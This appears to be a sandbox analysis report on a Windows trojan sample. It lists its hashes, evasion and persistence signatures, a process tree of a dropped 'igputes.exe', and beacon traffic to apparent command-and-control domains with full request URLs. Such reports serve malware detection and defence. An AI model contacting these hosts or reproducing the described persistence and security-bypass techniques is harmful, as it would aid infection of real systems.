Overview

overview

10

Static

static

3

ca5598376d...AS.exe

windows7-x64

10

ca5598376d...AS.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    07/05/2024, 15:26 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ca5598376def17dbd0338edd6ad237f0_NEAS.exe

  • Size

    69KB

  • MD5

    ca5598376def17dbd0338edd6ad237f0

  • SHA1

    0208f2287739dc748b6abad1f6bcb7383fc6d09f

  • SHA256

    6b429aa1d0d27695c2dc672c2960151b8e0c8706bcec89332de8491cbf29902b

  • SHA512

    5f931ebf605e628b1c6fc741c283d7ee1c5e86313dacd44de513243e7be00a75dcfc403f34cb2bea5e929010a6ab16edd5c986c2ee2e2d6118164d2de0187820

  • SSDEEP

    1536:1teqKDlXvCDB04f5Gn/L8FlADNt3d1Hw8Dg:Olg35GTslA5t3/w8Dg

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • Windows security bypass 2 TTPs 4 IoCs
    evasiontrojan
  • Modifies Installed Components in the registry 2 TTPs 4 IoCs
    persistence
  • Sets file execution options in registry 2 TTPs 3 IoCs
    persistence
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Windows security modification 2 TTPs 4 IoCs
    evasiontrojan
  • Modifies WinLogon 2 TTPs 5 IoCs
    persistence
  • Drops file in System32 directory 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
        PID:1200
        • C:\Users\Admin\AppData\Local\Temp\ca5598376def17dbd0338edd6ad237f0_NEAS.exe
          "C:\Users\Admin\AppData\Local\Temp\ca5598376def17dbd0338edd6ad237f0_NEAS.exe"
          2⤵
          • Loads dropped DLL
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1180
          • C:\Windows\SysWOW64\igputes.exe
            "C:\Windows\system32\igputes.exe"
            3⤵
            • Windows security bypass
            • Modifies Installed Components in the registry
            • Sets file execution options in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Windows security modification
            • Modifies WinLogon
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1628
            • C:\Windows\SysWOW64\igputes.exe
              --k33p
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1836

      Network

      • flag-us
        DNS
        gzygoeqwprw.ph
        igputes.exe
        Remote address:
        8.8.8.8:53
        Request
        gzygoeqwprw.ph
        IN A
        Response
        gzygoeqwprw.ph
        IN A
        45.79.222.138
      • flag-us
        DNS
        igputes.exe
        Remote address:
        45.79.222.138:80
        Response
        HTTP/1.1 400 Bad request
        Content-length: 90
        Cache-Control: no-cache
        Connection: close
        Content-Type: text/html
      • flag-us
        DNS
        utbidet-ugeas.biz
        igputes.exe
        Remote address:
        8.8.8.8:53
        Request
        utbidet-ugeas.biz
        IN A
        Response
        utbidet-ugeas.biz
        IN A
        54.157.24.8
      • flag-us
        GET
        http://utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825
        igputes.exe
        Remote address:
        54.157.24.8:80
        Request
        GET /d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825 HTTP/1.0
        Host: utbidet-ugeas.biz
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
        Response
        HTTP/1.1 302 Moved Temporarily
        Server: openresty
        Date: Tue, 07 May 2024 15:26:35 GMT
        Content-Type: text/html
        Content-Length: 142
        Connection: close
        Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
        Location: http://ww99.utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825
        Cache-Control: no-store, max-age=0
      • flag-us
        DNS
        utbidet-ugeas.biz
        igputes.exe
        Remote address:
        8.8.8.8:53
        Request
        utbidet-ugeas.biz
        IN A
        Response
        utbidet-ugeas.biz
        IN A
        54.157.24.8
      • flag-us
        GET
        http://utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825
        igputes.exe
        Remote address:
        54.157.24.8:80
        Request
        GET /d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825 HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
        Host: utbidet-ugeas.biz
        Cache-Control: no-cache
        Response
        HTTP/1.1 302 Moved Temporarily
        Server: openresty
        Date: Tue, 07 May 2024 15:26:35 GMT
        Content-Type: text/html
        Content-Length: 142
        Connection: keep-alive
        Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
        Location: http://ww99.utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825
        Cache-Control: no-store, max-age=0
      • 45.79.222.138:80
        gzygoeqwprw.ph
        http
        igputes.exe
        236 B
         339 B
         5
        3

        HTTP Response

        400
      • 54.157.24.8:80
        http://utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825
        http
        igputes.exe
        427 B
         741 B
         5
        4

        HTTP Request

        GET http://utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825

        HTTP Response

        302
      • 54.157.24.8:80
        http://utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825
        http
        igputes.exe
        833 B
         1.4kB
         13
        5

        HTTP Request

        GET http://utbidet-ugeas.biz/d/N?02992535D2992535D2AB2519D29925AC84BB075D9498253FAD99F003FCA80B02E4A9141B81FC5743BBFA401582F8465EF2A825

        HTTP Response

        302
      • 8.8.8.8:53
        gzygoeqwprw.ph
        dns
        igputes.exe
        60 B
         76 B
         1
        1

        DNS Request

        gzygoeqwprw.ph

        DNS Response

        45.79.222.138

      • 8.8.8.8:53
        utbidet-ugeas.biz
        dns
        igputes.exe
        63 B
         79 B
         1
        1

        DNS Request

        utbidet-ugeas.biz

        DNS Response

        54.157.24.8

      • 8.8.8.8:53
        utbidet-ugeas.biz
        dns
        igputes.exe
        63 B
         79 B
         1
        1

        DNS Request

        utbidet-ugeas.biz

        DNS Response

        54.157.24.8

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\SysWOW64\eafcoanut-otoot.exe
        Filesize

        71KB

        MD5

        26e5f13c09d260093a8e9ad70f76df94

        SHA1

        d94bfc198ba2a6218379820c64c262bd7c06e2f1

        SHA256

        4d99ced231257e3358ddc93eeffb67082a4aae5b6ca9cd57af999bfb6d9afb3d

        SHA512

        a521fed94fd000ed92ae498208ab32ca49782c17bed8a50c9d864e17c78cf5c4c9b4911628cfbc42d214ff421bc7d53fd0f15420ca04b227853f8168b074416e

        Download Submit

      • C:\Windows\SysWOW64\oukdoafib-uxac.dll
        Filesize

        5KB

        MD5

        f37b21c00fd81bd93c89ce741a88f183

        SHA1

        b2796500597c68e2f5638e1101b46eaf32676c1c

        SHA256

        76cf016fd77cb5a06c6ed4674ddc2345e8390c010cf344491a6e742baf2c0fb0

        SHA512

        252fe66dea9a4b9aebc5fd2f24434719cb25159ba51549d9de407f44b6a2f7bce6e071be02c4f2ad6aef588c77f12c00ed415eb54f96dec1b077326e101ce0f4

        Download Submit

      • C:\Windows\SysWOW64\ouploarur.exe
        Filesize

        72KB

        MD5

        8aa623406b54720358d342c044c7d144

        SHA1

        ac3043971f81bb492fd0783895a96aa2b0f4f4e2

        SHA256

        bc19fad5fff5fe0a78338d45960969629888f668d076685b960648f739480007

        SHA512

        cb4d43c5fcb456d4fd2b11c9e007579017f98b5602d484f02699ea881a07b555b4d3df7c35929269ebb2adc58e075b004e7d846e945132a05aa976499e1e5f44

        Download Submit

      • \Windows\SysWOW64\igputes.exe
        Filesize

        69KB

        MD5

        ca5598376def17dbd0338edd6ad237f0

        SHA1

        0208f2287739dc748b6abad1f6bcb7383fc6d09f

        SHA256

        6b429aa1d0d27695c2dc672c2960151b8e0c8706bcec89332de8491cbf29902b

        SHA512

        5f931ebf605e628b1c6fc741c283d7ee1c5e86313dacd44de513243e7be00a75dcfc403f34cb2bea5e929010a6ab16edd5c986c2ee2e2d6118164d2de0187820

        Download Submit

      • memory/1180-10-0x0000000000400000-0x0000000000414000-memory.dmp

        Filesize

        80KB

        Download

      • memory/1628-55-0x0000000000400000-0x0000000000414000-memory.dmp

        Filesize

        80KB

        Download

      • memory/1836-56-0x0000000000400000-0x0000000000414000-memory.dmp

        Filesize

        80KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.